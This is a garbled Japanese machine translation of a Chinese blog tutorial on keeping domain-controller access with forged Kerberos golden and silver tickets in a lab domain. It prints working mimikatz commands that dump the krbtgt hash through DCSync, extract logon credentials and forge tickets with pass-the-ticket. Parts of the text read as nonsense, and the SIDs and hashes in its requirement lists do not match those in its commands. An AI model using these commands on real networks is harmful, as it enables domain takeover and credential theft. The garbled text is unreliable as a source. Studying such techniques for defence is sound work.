浸透後 - 金と銀手形の手形の使用を維持するために、ドメイン権限が許可ドメインコントローラを取得します

免責事項:この記事は技術は、ネットワークセキュリティの専門家と白い帽子を使用するためのもので記述し、直接に対処するために国家安全保障機関に提出して発見後、任意の個人または組織は、犯罪行為のテクノロジやツールの利用を広めてはいけません

維持するためのパーミッション

ここに画像を挿入説明

ゴールドノート

Ms14068の脆弱性の原則は、ドメイン管TGTを偽造し、法案の原則の脆弱性は、ユーザーの許可を得て、チケットを発行してユーザーコントロールを管理するために使用された偽造金のkrbtgtユーザーの法案、KRBTGTユーザードメインである、ことができます偽のシステム任意のユーザ

条件黄金のチケット要件:
1.ドメイン名hacker.com
2.ドメインSID値-1-5-21-1854149318-4101476522-1845767379 S
KRBTGTアカウントのNTLMパスワードハッシュ3.ドメインまたはAES-256値
0028977ae726d766b150520dc63df9b4
4.偽のユーザ名の管理者

NTLMパスワードは、ドメインユーザーのkrbtgtの抽出をハッシュ

lsadump::dcsync /domain:hacker.com /user:krbtgt

偽造管理者ユーザー

kerberos::golden /admin:administrator /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /krbtgt:ce420fcea94d02d7051ebfb82833edf7 /ptt

シルバーノート

銀法案は偽造ST(チケット)である一方、法案の原理にシルバーとゴールドms14068法案は、同じ、ms14068金ノートがある偽造TGT(チケット発行されたチケット)ではありません、この利点は、KDC後にチケットがないので、より多くのなどCIFS(ファイル共有サービス)、MSSQL、WinRMの(Windowsリモート管理)、DNS、としてのみのサービスの仕事の一部に隠された、しかし、偽造チケット、

条件銀ノートの要件
1.ドメイン
hacker.com
2.ドメインSID
S-1-5-21-1854149318-4101476522-1845767379
3.ターゲットサーバFQDN
dc.hacker.com
4.利用可能なサービス
CIFS
5.サービスNTML HASHアカウント
52c74fc45feba971209be6f2bc068814
。6。必要性の偽のユーザー名の
テスト

ドメインコントローラマシンのハッシュを取得

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt

シルバー偽札

kerberos::golden /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /target:dc.hacker.com /service:cifs /rc4:031091bab05b768b471a7060b6d1bbf1 /user:test /ptt

ここに画像を挿入説明

実験環境:

  • Windows Serverの2012 R2 x64の(ドメインコントローラマシン)
  • Windows 7のx64のSP1の(ドメイン・ユーザー・マシン)
  • pfSense(ルーティング)
    ms14068

構築するための具体的な方法を参照してください3万言葉のネットワーク詳細な展開のチュートリアルを構築するために企業内のドメイン制御環境を

ここに画像を挿入説明

シミュレーション:

ゴールド偽札

情報収集

ipconfig /allドメイン名を取得する
ここに画像を挿入説明
whoami /allSIDを取得するには
ここに画像を挿入説明
NTLMパスワードハッシュのkrbtgtユーザーを取得するためにmimikatzソフトウェアを使用して
ここに画像を挿入説明
入力klist purge、削除、チケットには
ここに画像を挿入説明

偽のチケット

mimikatz偽造ソフトウェア文の管理者ユーザを使用してチケットを実行してから終了するには、収集した情報を交換します
ここに画像を挿入説明
成功したドメインコントローラを持って
ここに画像を挿入説明
法案と拒否されたアクセス権を削除します
ここに画像を挿入説明

シルバー偽札

情報収集

ipconfig /allドメインコントローラのIP取得
ここに画像を挿入説明
の入力をping -a 10.1.1.1完全ドメイン名を取得するためにdc.kacker.com
ここに画像を挿入説明
whoami /allSIDを取得するには
ここに画像を挿入説明
、輸出にドメインコントローラのマシンハッシュを
ここに画像を挿入説明

偽のチケット

収集された情報は、実行文mimikatzソフトウェア偽造チケットを交換するために使用され、あなたが訪問することができます
ここに画像を挿入説明

公開された113元の記事 ウォンの賞賛1301 ビュー20万+

おすすめ

転載: blog.csdn.net/weixin_45728976/article/details/105290034